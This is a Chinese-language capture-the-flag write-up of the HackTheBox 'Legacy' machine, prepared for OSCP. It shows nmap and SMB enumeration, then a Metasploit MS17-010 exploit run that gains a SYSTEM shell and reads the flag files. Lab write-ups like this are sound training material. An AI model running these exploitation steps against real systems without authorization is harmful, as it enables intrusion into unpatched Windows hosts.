渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

admin 2023年2月3日02:18:18评论76 views字数 875阅读2分55秒阅读模式

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

靶机信息

靶机地址:

https://app.hackthebox.com/machines/Legacy

靶场: HackTheBox.com

靶机名称:Legacy

难度: 简单

提示信息:

目标: user.txt和root.txt

实验环境

攻击机:Manjaro 10.10.16.3

靶机:10.10.10.4

信息收集

扫描端口

扫描靶机开放的服务端口

sudo masscan -p1-65535 --interface tun0 10.10.10.4

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

sudo nmap -sC -sV -p 139,445 10.10.10.4 -oN nmap.log

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

从扫描结果中看到是一台windows xp操作系统的主机,先来看看smb服务

SMB服务渗透

smbmap -H 10.10.10.4

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

smbclient -N -L 10.10.10.4

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

rpcclient 10.10.10.4 -U ""

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

使用多款工具检测无任何结果,使用nmap自带的脚本扫描

先来看看nmap自带的有哪些smb的poc脚本

find /usr/share/nmap/scripts |grep smb |grep vuln

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

poc有很多,开始检测

nmap --script smb-vuln* 10.10.10.4 -p 445 -oN nmap-smb-vuln.log

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

扫描结果中可以看到445端口存在MS17-010漏洞,可以使用msf攻击

msfconsole

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

搜索ms17-010的exp并按序号选择第1个

search ms17-010
use 1

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

查看需要修改的选项,并修改目标IP和本地IP

show options
set RHOSTS 10.10.10.4
set LHOST 10.10.16.3

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

设置完成开始攻击

exploit

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

攻击成功,直接拿到SYSTEM权限,来找找flag

shell
cd c:"Documents and Settings"

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

type johndesktopuser.txt
type administratordesktoproot.txt

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

拿到2个flag,游戏结束

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)


原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月3日02:18:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习No.121 HTB:Legacy(OSCP Prep)http://cn-sec.com/archives/1342761.html

发表评论

匿名网友 填写信息